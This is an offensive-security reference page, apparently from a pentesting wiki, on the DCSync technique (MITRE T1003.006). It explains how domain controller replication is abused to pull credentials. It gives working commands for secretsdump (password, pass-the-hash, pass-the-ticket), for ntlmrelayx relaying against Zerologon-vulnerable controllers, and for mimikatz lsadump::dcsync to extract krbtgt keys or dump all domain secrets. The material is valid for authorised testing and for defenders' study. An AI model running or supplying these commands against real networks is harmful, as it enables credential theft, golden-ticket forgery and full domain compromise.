MITRE ATT&CK™ Sub-technique T1003.006
DCSync is a technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller. This attack can lead to the compromise of major credential material such as the Kerberos
krbtgtkeys used legitimately for tickets creation, but also for tickets forging by attackers. The consequences of this attack are similar to an NTDS.dit dump and parsing but the practical aspect differ. A DCSync is not a simple copy & parse of the NTDS.dit file, it's a
DsGetNCChangesoperation transported in an RPC request to the DRSUAPI (Directory Replication Service API) to replicate data (including credentials) from a domain controller.
This attack requires domain admin privileges to succeed (more specifically, it needs the following extended privileges:
DS-Replication-Get-Changes-All). Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. In some cases, over-privileged accounts can be abused to grant controlled objects the right to DCSync.
# using a plaintext password
secretsdump -outputfile 'something' 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'
# with Pass-the-Hash
secretsdump -outputfile 'something' -hashes 'LMhash':'NThash' 'DOMAIN'/'USER'@'DOMAINCONTROLLER'
# with Pass-the-Ticket
secretsdump -k -outputfile 'something' 'DOMAIN'/'USER'@'DOMAINCONTROLLER'
The secretsdump script creates the following files.
# target vulnerable to Zerologon, dump DC's secrets only
ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER'
# target vulnerable to Zerologon, dump Domain's secrets
ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'
On Windows, mimikatz (C) can be used
lsadump::dcsyncto operate a DCSync and recover the
krbtgtkeys for a golden ticket attack for example. For this attack to work, the following mimikatz command should run in an elevated context (i.e. through runas with plaintext password, pass-the-hash or pass-the-ticket).
# Extract a specific user, in this case the krbtgt
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
# Dump everything (printed in a short and readable format)
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /all /csv